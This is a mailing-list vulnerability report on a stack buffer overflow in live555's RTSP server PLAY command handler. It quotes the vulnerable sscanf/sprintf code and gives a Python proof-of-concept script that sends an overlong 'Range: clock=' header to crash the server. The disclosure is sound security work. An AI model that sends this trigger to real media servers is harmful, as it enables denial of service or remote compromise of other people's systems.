[Live-devel] [Security Issue][liblivemedia] stack buffer overflow in liblivemedia
向小波
xiangxiaobo at iie.ac.cn
Wed Jul 8 21:07:16 PDT 2020
[summary]
In the latest version of live555 mediaserver, there is a stack based buffer
overflow vulnerability when parsing 'PLAY' command.
An attacker is able to send a sequence of malformed RTSP packets to trigger
this issue. In the worst case, the media server running this service can be
exploited remotely without user interaction.
[bug details]
The bug is in function RTSPServer::RTSPClientSession::handleCmd_PLAY().
It calls a sscanf function to get absolute start time and end time as
strings. This is an unsafe c function that should be taken good care of.
```cpp
} else if (sscanf(paramStr, "clock = %n", &numCharsMatched3) == 0 &&
numCharsMatched3 > 0) {
rangeStart = rangeEnd = 0.0;
char const* utcTimes = ¶mStr[numCharsMatched3];
size_t len = strlen(utcTimes) + 1;
char* as = new char[len];
char* ae = new char[len];
int sscanfResult = sscanf(utcTimes, "%[^-]-%[^\r\n]", as, ae); ///
<=== dangerous function call
if (sscanfResult == 2) {
absStartTime = as;
absEndTime = ae;
} else if (sscanfResult == 1) {
```
The absStartTime and absEndTime will then be filled into a buffer in the
stack whose size is 100. While the absStart and absEnd are controllable by
us, so it is possible to overflow the buffer in the stack.
```cpp
char buf[100];
......
if (absStart != NULL)
{
// We're seeking by 'absolute' time:
if (absEnd == NULL)
{
sprintf(buf, "Range: clock=%s-\r\n", absStart);
}
else
{
sprintf(buf, "Range: clock=%s-%s\r\n", absStart, absEnd);
}
delete[] absStart;
delete[] absEnd;
}
'''
[proof of concept]
I've attached a python script to trigger this issue.
```python
import socket
import sys,time
s = socket.socket()
s.connect(("127.0.0.1",8554))
payload = 'OPTIONS rtsp://localhost:8554/small.ogv RTSP/1.0\r\n'
payload += 'CSeq: 2\r\n'
payload += 'User-Agent: ./testProgs/openRTSP (LIVE555 Streaming Media
v2019.05.29)\r\n\r\n'
s.send(payload)
time.sleep(0.1)
data = s.recv(0x10000)
print(data)
payload = 'DESCRIBE rtsp://localhost:8554/small.ogv RTSP/1.0 \r\nCSeq: 3
\r\nUser-Agent: ./testProgs/openRTSP (LIVE555 Streaming Media v2019.05.29)
\r\nAccep
t: application/sdp\r\n\r\n'
s.send(payload)
time.sleep(0.1)
print(s.recv(0x10000))
payload = 'SETUP rtsp://127.0.0.1:8554/small.ogv/track1 RTSP/1.0\r\nCSeq:
4\r\nUser-Agent: ./testProgs/openRTSP (LIVE555 Streaming Media
v2019.05.29)\r\nTra$sport: RTP/AVP;unicast;client_port=53642-53643\r\n\r\n'
s.send(payload)
time.sleep(0.1)
res = s.recv(0x10000)
print(res)
payload = 'PLAY rtsp://127.0.0.1:8554/small.ogv/track1 RTSP/1.0\r\nCSeq:
7\r\nUser-Agent: ./testProgs/openRTSP (LIVE555 Streaming Media
v2019.05.29)\r\nSession: %s\r\n\r\nRange: clock =
0.00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000-0.01\r\n\r\n'
% sessionId
s.send(payload)
time.sleep(0.1)
print(s.recv(0x10000))
while True:
pass
```
Best Regards,
Xiaobo Xiang
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.live555.com/pipermail/live-devel/attachments/20200709/5e1b5104/attachment.htm>
More information about the live-devel
mailing list